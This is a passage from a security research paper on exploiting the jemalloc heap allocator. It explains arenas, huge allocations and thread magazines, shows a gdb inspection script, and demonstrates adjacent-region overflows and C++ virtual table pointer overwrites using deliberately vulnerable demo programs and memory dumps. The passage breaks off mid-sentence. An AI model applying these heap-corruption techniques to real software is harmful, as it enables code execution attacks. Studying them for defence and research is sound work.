| | | | | | | | page | | | | arena_bin_t bins[]; | | | | | | | +-----------+ | | | .------------------------. | | | | | | | | region | | | | | bins[0] ... bins[27] | | | | | | | | +-----------+ | | | `------------------------' | | |.' | | | | region | | | | | | |.' | | | +-----------+ | | `-----+----------------------+----' | | | | region | | | | | | | | +-----------+ | | | | | | | . . . | | | v | | | .-----------. | | | .-------------------. | | | | page | | | | | .---------------. | | | | +-----------+ | | | | | arena_chunk_t |-+---+ | | | region | | | | | `---------------' | | | +-----------+ | | | [2-5] | .---------------. | | | | region | | | | | | arena_chunk_t | | | | +-----------+ | | | | `---------------' | | | | region | | | | | . . . | | | +-----------+ | | | | .---------------. | | | | | | | | arena_chunk_t | | | `---------------------' | | | `---------------' | | [2-6] | | | . . . | | .---------------------. | | `-------------------' | | | | | +----+--+---> arena_run_t | | | | | | | | +----------+ | | | .-----------. | | | | | | | page | | | | | | | +-----------+ | | | | | | | region | | | v | | | +-----------+ | | .--------------------------. | | | | region | | | | arena_bin_t | | | | +-----------+ | | | bins[0] (size 8) | | | | | region | | | | | | | | +-----------+ | | | .----------------------. | | | | . . . | | | | arena_run_t *runcur; |-+---------+ | | .-----------. | | | `----------------------' | | | | page | | | `--------------------------' | | +-----------+ | | | | | region | | | | | +-----------+ | | | | | region | | | | | +-----------+ | | | | | region | | | | | +-----------+ | | | | | | | `---------------------' | `---------------------------' ------[ 2.1.6 - Huge allocations Huge allocations are not very interesting for the attacker but they are an integral part of jemalloc which may affect the exploitation process. Simply put, huge allocations are represented by 'extent_node_t' structures that are ordered in a global red black tree which is common to all threads. [2-7] /* Tree of extents. */ typedef struct extent_node_s extent_node_t; struct extent_node_s { #ifdef MALLOC_DSS /* Linkage for the size/address-ordered tree. */ rb_node(extent_node_t) link_szad; #endif /* Linkage for the address-ordered tree. */ rb_node(extent_node_t) link_ad; /* Pointer to the extent that this tree node is responsible for. */ void *addr; /* Total region size. */ size_t size; }; typedef rb_tree(extent_node_t) extent_tree_t; The 'extent_node_t' structures are allocated in small memory regions called base nodes. Base nodes do not affect the layout of end user heap allocations since they are served either by the DSS or by individual memory mappings acquired by 'mmap()'. The actual method used to allocate free space depends on how jemalloc was compiled with 'mmap()' being the default. /* Allocate an extent node with which to track the chunk. */ node = base_node_alloc(); ... ret = chunk_alloc(csize, zero); ... /* Insert node into huge. */ node->addr = ret; node->size = csize; ... malloc_mutex_lock(&huge_mtx); extent_tree_ad_insert(&huge, node); The most interesting thing about huge allocations is the fact that free base nodes are kept in a simple array of pointers called 'base_nodes'. The aforementioned array, although defined as a simple pointer, it's handled as if it was a two dimensional array holding pointers to available base nodes. static extent_node_t *base_nodes; ... static extent_node_t * base_node_alloc(void) { extent_node_t *ret; malloc_mutex_lock(&base_mtx); if (base_nodes != NULL) { ret = base_nodes; base_nodes = *(extent_node_t **)ret; ... } ... } static void base_node_dealloc(extent_node_t *node) { malloc_mutex_lock(&base_mtx); *(extent_node_t **)node = base_nodes; base_nodes = node; ... } Taking into account how 'base_node_alloc()' works, it's obvious that if an attacker corrupts the pages that contain the base node pointers, she can force jemalloc to use an arbitrary address as a base node pointer. This itself can lead to interesting scenarios but they are out of the scope of this article since the chances of achieving something like this are quite low. Nevertheless, a quick review of the code reveals that one may be able to achieve this goal by forcing huge allocations once she controls the physically last region of an arena. The attack is possible if and only if the mappings that will hold the base pointers are allocated right after the attacker controlled region. A careful reader would have noticed that if an attacker manages to pass a controlled value as the first argument to 'base_node_dealloc()' she can get a '4bytes anywhere' result. Unfortunately, as far as the authors can see, this is possible only if the global red black tree holding the huge allocations is corrupted. This situation is far more difficult to achieve than the one described in the previous paragraph. Nevertheless, we would really like to hear from anyone that manages to do so. ------[ 2.1.7 - Thread caches (tcache_t) In the previous paragraphs we mentioned how jemalloc allocates new arenas at will in order to avoid lock contention. In this section we will focus on the mechanisms that are activated on multicore systems and multithreaded programs. Let's set the following straight: 1) A multicore system is the reason jemalloc allocates more than one arena. On a unicore system there's only one available arena, even on multithreaded applications. However, the Firefox jemalloc variant has just one arena hardcoded, therefore it has no thread caches. 2) On a multicore system, even if the target application runs on a single thread, more than one arenas are used. No matter what the number of cores on the system is, a multithreaded application utilizing jemalloc will make use of the so called 'magazines' (also called 'tcaches' on newer versions of jemalloc). Magazines (tcaches) are thread local structures used to avoid thread blocking problems. Whenever a thread wishes to allocate a memory region, jemalloc will use those thread specific data structures instead of following the normal code path. void * arena_malloc(arena_t *arena, size_t size, bool zero) { ... if (size <= bin_maxclass) { #ifdef MALLOC_MAG if (__isthreaded && opt_mag) { mag_rack_t *rack = mag_rack; if (rack == NULL) { rack = mag_rack_create(arena); ... return (mag_rack_alloc(rack, size, zero)); } else #endif return (arena_malloc_small(arena, size, zero)); } ... } The 'opt_mag' variable is true by default. The variable '__isthreaded' is exported by 'libthr', the pthread implementation for FreeBSD and is set to 1 on a call to 'pthread_create()'. Obviously, the rest of the details are out of the scope of this article. In this section we will analyze thread magazines, but the exact same principles apply on the tcaches (the change in the nomenclature is probably the most notable difference between them). The behavior of thread magazines is affected by the following macros that are _defined_: MALLOC_MAG - Make use of thread magazines. MALLOC_BALANCE - Balance arena usage using a simple linear random number generator (have a look at 'choose_arena()'). The following constants are _undefined_: NO_TLS - TLS _is_ available on __i386__ Furthermore, 'opt_mag', the jemalloc runtime option controlling thread magazine usage, is, as we mentioned earlier, enabled by default. The following figure depicts the relationship between the various thread magazines' structures. .-------------------------------------------. | mag_rack_t | | | | bin_mags_t bin_mags[]; | | | | .-------------------------------------. | | | bin_mags[0] ... bin_mags[nbins - 1] | | | `-------------------------------------' | `--------|----------------------------------' | | .------------------. | +----------->| mag_t | v | | | .----------------------. | | void *rounds[] | | bin_mags_t | | | ... | | | | `------------------' | .----------------. | | | | mag_t *curmag; |-----------+ | `----------------' | | ... | `----------------------' The core of the aforementioned thread local metadata is the 'mag_rack_t'. A 'mag_rack_t' is a simplified equivalent of an arena. It is composed of a single array of 'bin_mags_t' structures. Each thread in a program is associated with a private 'mag_rack_t' which has a lifetime equal to the application's. typedef struct mag_rack_s mag_rack_t; struct mag_rack_s { bin_mags_t bin_mags[1]; /* Dynamically sized. */ }; Bins belonging to magazine racks are represented by 'bin_mags_t' structures (notice the plural form). /* * Magazines are lazily allocated, but once created, they remain until the * associated mag_rack is destroyed. */ typedef struct bin_mags_s bin_mags_t; struct bin_mags_s { mag_t *curmag; mag_t *sparemag; }; typedef struct mag_s mag_t; struct mag_s { size_t binind; /* Index of associated bin. */ size_t nrounds; void *rounds[1]; /* Dynamically sized. */ }; Just like a normal bin is associated with a run, a 'bin_mags_t' structure is associated with a magazine pointed by 'curmag' (recall 'runcur'). A magazine is nothing special but a simple array of void pointers which hold memory addresses of preallocated memory regions which are exclusively used by a single thread. Magazines are populated in function 'mag_load()' as seen below. void mag_load(mag_t *mag) { arena_t *arena; arena_bin_t *bin; arena_run_t *run; void *round; size_t i; /* Pick a random arena and the bin responsible for servicing * the required size class. */ arena = choose_arena(); bin = &arena->bins[mag->binind]; ... for (i = mag->nrounds; i < max_rounds; i++) { ... if ((run = bin->runcur) != NULL && run->nfree > 0) round = arena_bin_malloc_easy(arena, bin, run); /* [3-23] */ else round = arena_bin_malloc_hard(arena, bin); /* [3-24] */ if (round == NULL) break; /* Each 'rounds' holds a preallocated memory region. */ mag->rounds[i] = round; } ... mag->nrounds = i; } When a thread calls 'malloc()', the call chain eventually reaches 'mag_rack_alloc()' and then 'mag_alloc()'. /* Just return the next available void pointer. It points to one of the * preallocated memory regions. */ void * mag_alloc(mag_t *mag) { if (mag->nrounds == 0) return (NULL); mag->nrounds--; return (mag->rounds[mag->nrounds]); } The most notable thing about magazines is the fact that 'rounds', the array of void pointers, as well as all the related thread metadata (magazine racks, magazine bins and so on) are allocated by normal calls to functions 'arena_bin_malloc_xxx()' ([3-23], [3-24]). This results in the thread metadata lying around normal memory regions. ------[ 2.1.8 - Unmask jemalloc As we are sure you are all aware, since version 7.0, gdb can be scripted with Python. In order to unmask and bring to light the internals of the various jemalloc flavors, we have developed a Python script for gdb appropriately named unmask_jemalloc.py. The following is a sample run of the script on Firefox 11.0 on Linux x86 (edited for readability): $ ./firefox-bin & $ gdb -x ./gdbinit -p `ps x | grep firefox | grep -v grep \ | grep -v debug | awk '{print $1}'` GNU gdb (GDB) 7.4-debian ... Attaching to process 3493 add symbol table from file "/dbg/firefox-latest-symbols/firefox-bin.dbg" at .text_addr = 0x80494b0 add symbol table from file "/dbg/firefox-latest-symbols/libxul.so.dbg" at .text_addr = 0xb5b9a9d0 ... [Thread 0xa4ffdb70 (LWP 3533) exited] [Thread 0xa57feb70 (LWP 3537) exited] [New Thread 0xa57feb70 (LWP 3556)] [Thread 0xa57feb70 (LWP 3556) exited] gdb $ source unmask_jemalloc.py gdb $ unmask_jemalloc runs [jemalloc] [number of arenas: 1] [jemalloc] [number of bins: 24] [jemalloc] [no magazines/thread caches detected] [jemalloc] [arena #00] [bin #00] [region size: 0x0004] [current run at: 0xa52d9000] [jemalloc] [arena #00] [bin #01] [region size: 0x0008] [current run at: 0xa37c8000] [jemalloc] [arena #00] [bin #02] [region size: 0x0010] [current run at: 0xa372c000] [jemalloc] [arena #00] [bin #03] [region size: 0x0020] [current run at: 0xa334d000] [jemalloc] [arena #00] [bin #04] [region size: 0x0030] [current run at: 0xa3347000] [jemalloc] [arena #00] [bin #05] [region size: 0x0040] [current run at: 0xa334a000] [jemalloc] [arena #00] [bin #06] [region size: 0x0050] [current run at: 0xa3732000] [jemalloc] [arena #00] [bin #07] [region size: 0x0060] [current run at: 0xa3701000] [jemalloc] [arena #00] [bin #08] [region size: 0x0070] [current run at: 0xa3810000] [jemalloc] [arena #00] [bin #09] [region size: 0x0080] [current run at: 0xa3321000] [jemalloc] [arena #00] [bin #10] [region size: 0x00f0] [current run at: 0xa57c7000] [jemalloc] [arena #00] [bin #11] [region size: 0x0100] [current run at: 0xa37e9000] [jemalloc] [arena #00] [bin #12] [region size: 0x0110] [current run at: 0xa5a9b000] [jemalloc] [arena #00] [bin #13] [region size: 0x0120] [current run at: 0xa56ea000] [jemalloc] [arena #00] [bin #14] [region size: 0x0130] [current run at: 0xa3709000] [jemalloc] [arena #00] [bin #15] [region size: 0x0140] [current run at: 0xa382c000] [jemalloc] [arena #00] [bin #16] [region size: 0x0150] [current run at: 0xa39da000] [jemalloc] [arena #00] [bin #17] [region size: 0x0160] [current run at: 0xa56ee000] [jemalloc] [arena #00] [bin #18] [region size: 0x0170] [current run at: 0xa3849000] [jemalloc] [arena #00] [bin #19] [region size: 0x0180] [current run at: 0xa3a21000] [jemalloc] [arena #00] [bin #20] [region size: 0x01f0] [current run at: 0xafc51000] [jemalloc] [arena #00] [bin #21] [region size: 0x0200] [current run at: 0xa3751000] [jemalloc] [arena #00] [bin #22] [region size: 0x0400] [current run at: 0xa371d000] [jemalloc] [arena #00] [bin #23] [region size: 0x0800] [current run at: 0xa370d000] [jemalloc] [run 0xa3347000] [from 0xa3347000 to 0xa3348000L] [jemalloc] [run 0xa371d000] [from 0xa371d000 to 0xa3725000L] [jemalloc] [run 0xa3321000] [from 0xa3321000 to 0xa3323000L] [jemalloc] [run 0xa334a000] [from 0xa334a000 to 0xa334b000L] [jemalloc] [run 0xa370d000] [from 0xa370d000 to 0xa3715000L] [jemalloc] [run 0xa3709000] [from 0xa3709000 to 0xa370d000L] [jemalloc] [run 0xa37c8000] [from 0xa37c8000 to 0xa37c9000L] [jemalloc] [run 0xa5a9b000] [from 0xa5a9b000 to 0xa5a9f000L] [jemalloc] [run 0xa3a21000] [from 0xa3a21000 to 0xa3a27000L] [jemalloc] [run 0xa382c000] [from 0xa382c000 to 0xa3831000L] [jemalloc] [run 0xa3701000] [from 0xa3701000 to 0xa3702000L] [jemalloc] [run 0xa57c7000] [from 0xa57c7000 to 0xa57ca000L] [jemalloc] [run 0xa56ee000] [from 0xa56ee000 to 0xa56f3000L] [jemalloc] [run 0xa39da000] [from 0xa39da000 to 0xa39df000L] [jemalloc] [run 0xa37e9000] [from 0xa37e9000 to 0xa37ed000L] [jemalloc] [run 0xa3810000] [from 0xa3810000 to 0xa3812000L] [jemalloc] [run 0xa3751000] [from 0xa3751000 to 0xa3759000L] [jemalloc] [run 0xafc51000] [from 0xafc51000 to 0xafc58000L] [jemalloc] [run 0xa334d000] [from 0xa334d000 to 0xa334e000L] [jemalloc] [run 0xa372c000] [from 0xa372c000 to 0xa372d000L] [jemalloc] [run 0xa52d9000] [from 0xa52d9000 to 0xa52da000L] [jemalloc] [run 0xa56ea000] [from 0xa56ea000 to 0xa56ee000L] [jemalloc] [run 0xa3732000] [from 0xa3732000 to 0xa3733000L] [jemalloc] [run 0xa3849000] [from 0xa3849000 to 0xa384e000L] There is also preliminary support for Mac OS X (x86_64), tested on Lion 10.7.3 with Firefox 11.0. Also, note that Apple's gdb does not have Python scripting support, so the following was obtained with a custom-compiled gdb: $ open firefox-11.0.app $ gdb -nx -x ./gdbinit -p 837 ... Attaching to process 837 [New Thread 0x2003 of process 837] [New Thread 0x2103 of process 837] [New Thread 0x2203 of process 837] [New Thread 0x2303 of process 837] [New Thread 0x2403 of process 837] [New Thread 0x2503 of process 837] [New Thread 0x2603 of process 837] [New Thread 0x2703 of process 837] [New Thread 0x2803 of process 837] [New Thread 0x2903 of process 837] [New Thread 0x2a03 of process 837] [New Thread 0x2b03 of process 837] [New Thread 0x2c03 of process 837] [New Thread 0x2d03 of process 837] [New Thread 0x2e03 of process 837] Reading symbols from /dbg/firefox-11.0.app/Contents/MacOS/firefox...done Reading symbols from /dbg/firefox-11.0.app/Contents/MacOS/firefox.dSYM/ Contents/Resources/DWARF/firefox...done. 0x00007fff8636b67a in ?? () from /usr/lib/system/libsystem_kernel.dylib (gdb) source unmask_jemalloc.py (gdb) unmask_jemalloc [jemalloc] [number of arenas: 1] [jemalloc] [number of bins: 35] [jemalloc] [no magazines/thread caches detected] [jemalloc] [arena #00] [bin #00] [region size: 0x0008] [current run at: 0x108fe0000] [jemalloc] [arena #00] [bin #01] [region size: 0x0010] [current run at: 0x1003f5000] [jemalloc] [arena #00] [bin #02] [region size: 0x0020] [current run at: 0x1003bc000] [jemalloc] [arena #00] [bin #03] [region size: 0x0030] [current run at: 0x1003d7000] [jemalloc] [arena #00] [bin #04] [region size: 0x0040] [current run at: 0x1054c6000] [jemalloc] [arena #00] [bin #05] [region size: 0x0050] [current run at: 0x103652000] [jemalloc] [arena #00] [bin #06] [region size: 0x0060] [current run at: 0x110c9c000] [jemalloc] [arena #00] [bin #07] [region size: 0x0070] [current run at: 0x106bef000] [jemalloc] [arena #00] [bin #08] [region size: 0x0080] [current run at: 0x10693b000] [jemalloc] [arena #00] [bin #09] [region size: 0x0090] [current run at: 0x10692e000] [jemalloc] [arena #00] [bin #10] [region size: 0x00a0] [current run at: 0x106743000] [jemalloc] [arena #00] [bin #11] [region size: 0x00b0] [current run at: 0x109525000] [jemalloc] [arena #00] [bin #12] [region size: 0x00c0] [current run at: 0x1127c2000] [jemalloc] [arena #00] [bin #13] [region size: 0x00d0] [current run at: 0x106797000] [jemalloc] [arena #00] [bin #14] [region size: 0x00e0] [current run at: 0x109296000] [jemalloc] [arena #00] [bin #15] [region size: 0x00f0] [current run at: 0x110aa9000] [jemalloc] [arena #00] [bin #16] [region size: 0x0100] [current run at: 0x106c70000] [jemalloc] [arena #00] [bin #17] [region size: 0x0110] [current run at: 0x109556000] [jemalloc] [arena #00] [bin #18] [region size: 0x0120] [current run at: 0x1092bf000] [jemalloc] [arena #00] [bin #19] [region size: 0x0130] [current run at: 0x1092a2000] [jemalloc] [arena #00] [bin #20] [region size: 0x0140] [current run at: 0x10036a000] [jemalloc] [arena #00] [bin #21] [region size: 0x0150] [current run at: 0x100353000] [jemalloc] [arena #00] [bin #22] [region size: 0x0160] [current run at: 0x1093d3000] [jemalloc] [arena #00] [bin #23] [region size: 0x0170] [current run at: 0x10f024000] [jemalloc] [arena #00] [bin #24] [region size: 0x0180] [current run at: 0x106b58000] [jemalloc] [arena #00] [bin #25] [region size: 0x0190] [current run at: 0x10f002000] [jemalloc] [arena #00] [bin #26] [region size: 0x01a0] [current run at: 0x10f071000] [jemalloc] [arena #00] [bin #27] [region size: 0x01b0] [current run at: 0x109139000] [jemalloc] [arena #00] [bin #28] [region size: 0x01c0] [current run at: 0x1091c6000] [jemalloc] [arena #00] [bin #29] [region size: 0x01d0] [current run at: 0x10032a000] [jemalloc] [arena #00] [bin #30] [region size: 0x01e0] [current run at: 0x1054f9000] [jemalloc] [arena #00] [bin #31] [region size: 0x01f0] [current run at: 0x10034c000] [jemalloc] [arena #00] [bin #32] [region size: 0x0200] [current run at: 0x106739000] [jemalloc] [arena #00] [bin #33] [region size: 0x0400] [current run at: 0x106c68000] [jemalloc] [arena #00] [bin #34] [region size: 0x0800] [current run at: 0x10367e000] We did our best to test unmask_jemalloc.py on all jemalloc variants, however there are probably some bugs left. Feel free to test it and send us patches. The development of unmask_jemalloc.py will continue at [UJEM]. ----[ 2.2 - Algorithms In this section we present pseudocode the describes the allocation and deallocation algorithms implemented by jemalloc. We start with malloc(): MALLOC(size): IF size CAN BE SERVICED BY AN ARENA: IF size IS SMALL OR MEDIUM: bin = get_bin_for_size(size) IF bin->runcur EXISTS AND NOT FULL: run = bin->runcur ELSE: run = lookup_or_allocate_nonfull_run() bin->runcur = run bit = get_first_set_bit(run->regs_mask) region = get_region(run, bit) ELIF size IS LARGE: region = allocate_new_run() ELSE: region = allocate_new_chunk() RETURN region calloc() is as you would expect: CALLOC(n, size): RETURN MALLOC(n * size) Finally, the pseudocode for free(): FREE(addr): IF addr IS NOT EQUAL TO THE CHUNK IT BELONGS: IF addr IS A SMALL ALLOCATION: run = get_run_addr_belongs_to(addr); bin = run->bin; size = bin->reg_size; element = get_element_index(addr, run, bin) unset_bit(run->regs_mask[element]) ELSE: /* addr is a large allocation */ run = get_run_addr_belongs_to(addr) chunk = get_chunk_run_belongs_to(run) run_index = get_run_index(run, chunk) mark_pages_of_run_as_free(run_index) IF ALL THE PAGES OF chunk ARE MARKED AS FREE: unmap_the_chunk_s_pages(chunk) ELSE: /* this is a huge allocation */ unmap_the_huge_allocation_s_pages(addr) --[ 3 - Exploitation tactics In this section we analyze the exploitation tactics we have investigated against jemalloc. Our goal is to provide to the interested hackers the necessary knowledge and tools to develop exploits for jemalloc heap corruption bugs. We also try to approach jemalloc heap exploitation in an abstract way initially, identifying 'exploitation primitives' and then continuing into the specific required technical details. Chris Valasek and Ryan Smith have explored the value of abstracting heap exploitation through primitives [CVRS]. The main idea is that specific exploitation techniques eventually become obsolete. Therefore it is important to approach exploitation abstractly and identify primitives that can applied to new targets. We have used this approach before, comparing FreeBSD and Linux kernel heap exploitation [HAPF, APHN]. Regarding jemalloc, we analyze adjacent data corruption, heap manipulation and metadata corruption exploitation primitives. ----[ 3.1 - Adjacent region corruption The main idea behind adjacent heap item corruptions is that you exploit the fact that the heap manager places user allocations next to each other contiguously without other data in between. In jemalloc regions of the same size class are placed on the same bin. In the case that they are also placed on the same run of the bin then there are no inline metadata between them. In 3.2 we will see how we can force this, but for now let's assume that new allocations of the same size class are placed in the same run. Therefore, we can place a victim object/structure of our choosing in the same run and next to the vulnerable object/structure we plan to overflow. The only requirement is that the victim and vulnerable objects need to be of a size that puts them in the same size class and therefore possibly in the same run (again, see the next subsection on how to control this). Since there are no metadata between the two regions, we can overflow from the vulnerable region to the victim region we have chosen. Usually the victim region is something that can help us achieve arbitrary code execution, for example function pointers. In the following contrived example consider that 'three' is your chosen victim object and that the vulnerable object is 'two' (full code in file test-adjacent.c): char *one, *two, *three; printf("[*] before overflowing\n"); one = malloc(0x10); memset(one, 0x41, 0x10); printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one); two = malloc(0x10); memset(two, 0x42, 0x10); printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two); three = malloc(0x10); memset(three, 0x43, 0x10); printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three); [3-1] printf("[+] copying argv[1] to region two\n"); strcpy(two, argv[1]); printf("[*] after overflowing\n"); printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one); printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two); printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three); [3-2] free(one); free(two); free(three); printf("[*] after freeing all regions\n"); printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one); printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two); printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three); [3-3] The output (edited for readability): $ ./test-adjacent `python -c 'print "X" * 30'` [*] before overflowing [+] region one: 0xb7003030: AAAAAAAAAAAAAAAA [+] region two: 0xb7003040: BBBBBBBBBBBBBBBB [+] region three: 0xb7003050: CCCCCCCCCCCCCCCC [+] copying argv[1] to region two [*] after overflowing [+] region one: 0xb7003030: AAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [+] region two: 0xb7003040: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [+] region three: 0xb7003050: XXXXXXXXXXXXXX [*] after freeing all regions [+] region one: 0xb7003030: AAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [+] region two: 0xb7003040: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [+] region three: 0xb7003050: XXXXXXXXXXXXXX Examining the above we can see that region 'one' is at 0xb7003030 and that the following two allocations (regions 'two' and 'three') are in the same run immediately after 'one' and all three next to each other without any metadata in between them. After the overflow of 'two' with 30 'X's we can see that region 'three' has been overwritten with 14 'X's (30 - 16 for the size of region 'two'). In order to achieve a better understanding of the jemalloc memory layout let's fire up gdb with three breakpoints at [3-1], [3-2] and [3-3]. At breakpoint [3-1]: Breakpoint 1, 0x080486a9 in main () gdb $ print arenas[0].bins[2].runcur $1 = (arena_run_t *) 0xb7003000 At 0xb7003000 is the current run of the bin bins[2] that manages the size class 16 in the standalone jemalloc flavor that we have linked against. Let's take a look at the run's contents: gdb $ x/40x 0xb7003000 0xb7003000: 0xb78007ec 0x00000003 0x000000fa 0xfffffff8 0xb7003010: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0xb7003020: 0xffffffff 0xffffffff 0x1fffffff 0x000000ff 0xb7003030: 0x41414141 0x41414141 0x41414141 0x41414141 0xb7003040: 0x42424242 0x42424242 0x42424242 0x42424242 0xb7003050: 0x43434343 0x43434343 0x43434343 0x43434343 0xb7003060: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7003070: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7003080: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7003090: 0x00000000 0x00000000 0x00000000 0x00000000 After some initial metadata (the run's header which we will see in more detail at 3.3.1) we have region 'one' at 0xb7003030 followed by regions 'two' and 'three', all of size 16 bytes. Again we can see that there are no metadata between the regions. Continuing to breakpoint [3-2] and examining again the contents of the run: Breakpoint 2, 0x08048724 in main () gdb $ x/40x 0xb7003000 0xb7003000: 0xb78007ec 0x00000003 0x000000fa 0xfffffff8 0xb7003010: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0xb7003020: 0xffffffff 0xffffffff 0x1fffffff 0x000000ff 0xb7003030: 0x41414141 0x41414141 0x41414141 0x41414141 0xb7003040: 0x58585858 0x58585858 0x58585858 0x58585858 0xb7003050: 0x58585858 0x58585858 0x58585858 0x43005858 0xb7003060: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7003070: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7003080: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7003090: 0x00000000 0x00000000 0x00000000 0x00000000 We can see that our 30 'X's (0x58) have overwritten the complete 16 bytes of region 'two' at 0xb7003040 and continued for 15 bytes (14 plus a NULL from strcpy(3)) in region 'three' at 0xb7003050. From this memory dump it should be clear why the printf(3) call of region 'one' after the overflow continues to print all 46 bytes (16 from region 'one' plus 30 from the overflow) up to the NULL placed by the strcpy(3) call. As it has been demonstrated by Peter Vreugdenhil in the context of Internet Explorer heap overflows [PV10], this can lead to information leaks from the region that is adjacent to the region with the string whose terminating NULL has been overwritten. You just need to read back the string and you will get all data up to the first encountered NULL. At breakpoint [3-3] after the deallocation of all three regions: Breakpoint 3, 0x080487ab in main () gdb $ x/40x 0xb7003000 0xb7003000: 0xb78007ec 0x00000003 0x000000fd 0xffffffff 0xb7003010: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0xb7003020: 0xffffffff 0xffffffff 0x1fffffff 0x000000ff 0xb7003030: 0x41414141 0x41414141 0x41414141 0x41414141 0xb7003040: 0x58585858 0x58585858 0x58585858 0x58585858 0xb7003050: 0x58585858 0x58585858 0x58585858 0x43005858 0xb7003060: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7003070: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7003080: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7003090: 0x00000000 0x00000000 0x00000000 0x00000000 We can see that jemalloc does not clear the freed regions. This behavior of leaving stale data in regions that have been freed and can be allocated again can lead to easier exploitation of use-after-free bugs (see next section). To explore the adjacent region corruption primitive further in the context of jemalloc, we will now look at C++ and virtual function pointers (VPTRs). We will only focus on jemalloc-related details; for more general information the interested reader should see rix's Phrack paper (the principles of which are still applicable) [VPTR]. We begin with a C++ example that is based on rix's bo2.cpp (file vuln-vptr.cpp in the code archive): class base { private: char buf[32]; public: void copy(const char *str) { strcpy(buf, str); } virtual void print(void) { printf("buf: 0x%08x: %s\n", buf, buf); } }; class derived_a : public base { public: void print(void) { printf("[+] derived_a: "); base::print(); } }; class derived_b : public base { public: void print(void) { printf("[+] derived_b: "); base::print(); } }; int main(int argc, char *argv[]) { base *obj_a; base *obj_b; obj_a = new derived_a; obj_b = new derived_b; printf("[+] obj_a:\t0x%x\n", (unsigned int)obj_a); printf("[+] obj_b:\t0x%x\n", (unsigned int)obj_b); if(argc == 3) { printf("[+] overflowing from obj_a into obj_b\n"); obj_a->copy(argv[1]); obj_b->copy(argv[2]); obj_a->print(); obj_b->print(); return 0; } We have a base class with a virtual function, 'print(void)', and two derived classes that overload this virtual function. Then in main, we use 'new' to create two new objects, one from each of the derived classes. Subsequently we overflow the 'buf' buffer of 'obj_a' with 'argv[1]'. Let's explore with gdb: $ gdb vuln-vptr ... gdb $ r `python -c 'print "A" * 48'` `python -c 'print "B" * 10'` ... 0x804862f : movl $0x24,(%esp) 0x8048636 : call 0x80485fc <_Znwj@plt> 0x804863b : movl $0x80489e0,(%eax) gdb $ print $eax $13 = 0xb7c01040 At 0x8048636 we can see the first 'new' call which takes as a parameter the size of the object to create, that is 0x24 or 36 bytes. C++ will of course use jemalloc to allocate the required amount of memory for this new object. After the call instruction, EAX has the address of the allocated region (0xb7c01040) and at 0x804863b the value 0x80489e0 is moved there. This is the VPTR that points to 'print(void)' of 'obj_a': gdb $ x/x *0x080489e0 0x80487d0 : 0xc71cec83 Now it must be clear why even though the declared buffer is 32 bytes long, there are 36 bytes allocated for the object. Exactly the same as above happens with the second 'new' call, but this time the VPTR points to 'obj_b' (which is at 0xb7c01070): 0x8048643 : movl $0x24,(%esp) 0x804864a : call 0x80485fc <_Znwj@plt> 0x804864f : movl $0x80489f0,(%eax) gdb $ x/x *0x080489f0 0x8048800 : 0xc71cec83 gdb $ print $eax $14 = 0xb7c01070 At this point, let's explore jemalloc's internals: gdb $ print arenas[0].bins[5].runcur $8 = (arena_run_t *) 0xb7c01000 gdb $ print arenas[0].bins[5].reg_size $9 = 0x30 gdb $ print arenas[0].bins[4].reg_size $10 = 0x20 gdb $ x/40x 0xb7c01000 0xb7c01000: 0xb7fd315c 0x00000000 0x00000052 0xfffffffc 0xb7c01010: 0xffffffff 0x000fffff 0x00000000 0x00000000 0xb7c01020: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7c01030: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7c01040: 0x080489e0 0x00000000 0x00000000 0x00000000 0xb7c01050: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7c01060: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7c01070: 0x080489f0 0x00000000 0x00000000 0x00000000 0xb7c01080: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7c01090: 0x00000000 0x00000000 0x00000000 0x00000000 Our run is at 0xb7c01000 and the bin is bin[5] which handles regions of size 0x30 (48 in decimal). Since our objects are of size 36 bytes they don't fit in the previous bin, i.e. bin[4], of size 0x20 (32). We can see 'obj_a' at 0xb7c01040 with its VPTR (0x080489e0) and 'obj_b' at 0xb7c01070 with its own VPTR (0x080489f0). Our next breakpoint is after the overflow of 'obj_a' into 'obj_b' and just before the first call of 'print()'. Our run now looks like the following: gdb $ x/40x 0xb7c01000 0xb7c01000: 0xb7fd315c 0x00000000 0x00000052 0xfffffffc 0xb7c01010: 0xffffffff 0x000fffff 0x00000000 0x00000000 0xb7c01020: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7c01030: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7c01040: 0x080489e0 0x41414141 0x41414141 0x41414141 0xb7c01050: 0x41414141 0x41414141 0x41414141 0x41414141 0xb7c01060: 0x41414141 0x41414141 0x41414141 0x41414141 0xb7c01070: 0x41414141 0x42424242 0x42424242 0x00004242 0xb7c01080: 0x00000000 0x00000000 0x00000000 0x00000000 0xb7c01090: 0x00000000 0x00000000 0x00000000 0x00000000 gdb $ x/i $eip 0x80486d1 : call *(%eax) gdb $ print $eax $15 = 0x80489e0 At 0x080486d1 is the call of 'print()' of 'obj_a'. At 0xb7c01070 we can see that we have overwritten the VPTR of 'obj_b' that was in an 